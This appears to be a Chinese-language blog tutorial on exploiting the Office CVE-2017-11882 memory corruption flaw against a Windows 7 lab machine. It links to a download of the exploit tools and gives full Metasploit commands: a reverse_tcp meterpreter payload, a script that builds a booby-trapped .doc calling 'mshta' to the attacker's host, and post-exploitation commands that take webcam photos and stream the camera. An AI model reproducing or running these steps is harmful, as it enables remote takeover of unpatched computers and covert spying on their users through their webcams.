2017年11月14日,微软发布了11月份的安全补丁更新,其中比较引人关注的莫过于悄然修复了潜伏17年之久的Office远程代码执行漏洞(CVE-2017-11882)。该漏洞为Office内存破坏漏洞,影响目前流行的所有Office版本。gongji者可以利用漏洞以当前登录的用户的身份执行任意命令。漏洞影响版本:Office 365
Microsoft Office 2000

                  Microsoft Office 2003      

                  Microsoft Office 2007 Service Pack 3

                  Microsoft Office 2010 Service Pack 2

                  Microsoft Office 2013 Service Pack 1

                  Microsoft Office 2016

工具链接:https://pan.baidu.com/s/1cAPboI5lawjxD2VPT13ABA 密码:fxrf
还是老样子KaliLinux做gongji机 ip:192.168.1.126
受害者主机Windows7 ip:192.168.1.128
1.首先把cve开头的文件放到kalilinux使用
cve-2017-11882
2.将cve_2017_11882.rb文件复制到/usr/share/metasploit-framework/modules/exploits/windows/smb/目录下
mv cve_2017_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/
ls /usr/share/metasploit-framework/modules/exploits/windows/smb/ 查看一下
cve-2017-11882
3.再将cve_2017_11882.rtf放到/usr/share/metasploit-framework/data/exploits/ 目录下
mv cve_2017_11882.rtf /usr/share/metasploit-framework/data/exploits
ls /usr/share/metasploit-framework/data/exploits
cve-2017-11882
4.打开神器图形化操作的msf(命令都一样只是这个更容易方便演示)
cve-2017-11882
为了你们太萌新我特地标了一下如何扫描ip地址和爆系统然后输入ip地址即可(只是为了效果好而已)
cve-2017-11882

小电脑就出来了还猜出来是Windows7
cve-2017-11882
5.然后在下面输入search cve_2017_11882查看有没有加载进去这个模块
cve-2017-11882
可能我版本比较高所以官方已经出了这个模块所以有两个
6.use exploit/windows/smb/cve_2017_11882 使用这个模块
cve-2017-11882
7.set payload windows/meterpreter/reverse_tcp
show options 查看一下配置
cve-2017-11882
8.set lhost 192.168.1.126 为自己的gongji机
set uripath emmm emmm为路径稍后用python生成脚本的时候用得到(后面我又改成test了 然后 set lport 4444改一下端口才运行)
show options 再看一下配置

(后面uripath我又改成test了 然后 set lport 4444改一下端口才运行)
cve-2017-11882
9.exploit -j 运行
cve-2017-11882
10.在终端生成doc文件
python Command109b_CVE-2017-11882.py -c "mshta http://192.168.1.126:8080/test" -o test.doc 生成doc文件
cve-2017-11882
然后将doc文件放到Windows7上(顺便安装office)
cve-2017-11882
看到这个文档然后手贱点了一下
cve-2017-11882
成功
cve-2017-11882
然后还是老样子
getuid getpid getvnc
cve-2017-11882
webcam_list 查看下摄像头 webcam_snf 1 照个照片 webcam_stream 开个网页查看摄像头
cve-2017-11882